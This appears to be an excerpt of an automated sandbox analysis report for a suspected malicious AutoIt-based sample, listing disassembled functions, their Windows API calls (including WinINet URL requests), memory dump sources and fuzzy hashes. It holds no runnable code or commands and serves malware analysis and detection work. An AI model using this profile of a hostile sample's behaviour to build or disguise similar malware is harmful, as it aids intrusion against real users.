                                                      • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                      • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                      • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                      Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                      • String ID:
                                                      • API String ID: 3705125965-3916222277
                                                      • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                      • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                      • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                      • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                      Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                      • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                      • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem
                                                      • String ID: 0
                                                      • API String ID: 135850232-4108050209
                                                      • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                      • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                      • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                      • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                      Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$Long
                                                      • String ID: SysTreeView32
                                                      • API String ID: 847901565-1698111956
                                                      • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                      • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                      • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                      • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                      Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                      • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                      • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc
                                                      • String ID: AU3_GetPluginDetails
                                                      • API String ID: 145871493-4132174516
                                                      • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                      • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                      • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                      • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                      Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window
                                                      • String ID: SysMonthCal32
                                                      • API String ID: 2326795674-1439706946
                                                      • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                      • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                      • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                      • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                      Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: DestroyWindow
                                                      • String ID: msctls_updown32
                                                      • API String ID: 3375834691-2298589950
                                                      • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                      • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                      • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                      • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                      Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: $<
                                                      • API String ID: 4104443479-428540627
                                                      • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                      • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                      • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                      • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                      Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID: \VH
                                                      • API String ID: 1682464887-234962358
                                                      • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                      • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                      • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                      • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                      Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID: \VH
                                                      • API String ID: 1682464887-234962358
                                                      • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                      • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                      • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                      • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                      Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID: \VH
                                                      • API String ID: 1682464887-234962358
                                                      • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                      • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                      • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                      • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                      Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume
                                                      • String ID: \VH
                                                      • API String ID: 2507767853-234962358
                                                      • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                      • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                      • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                      • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                      Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume
                                                      • String ID: \VH
                                                      • API String ID: 2507767853-234962358
                                                      • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                      • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                      • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                      • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                      Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                      • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: msctls_trackbar32
                                                      • API String ID: 3850602802-1010561917
                                                      • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                      • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                      • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                      • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                      Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                      • String ID: crts
                                                      • API String ID: 943502515-3724388283
                                                      • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                      • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                      • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                      • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                      Function 0046E48C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                      • CoInitialize.OLE32(00000000), ref: 0046E505
                                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                      • CoUninitialize.OLE32 ref: 0046E53D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
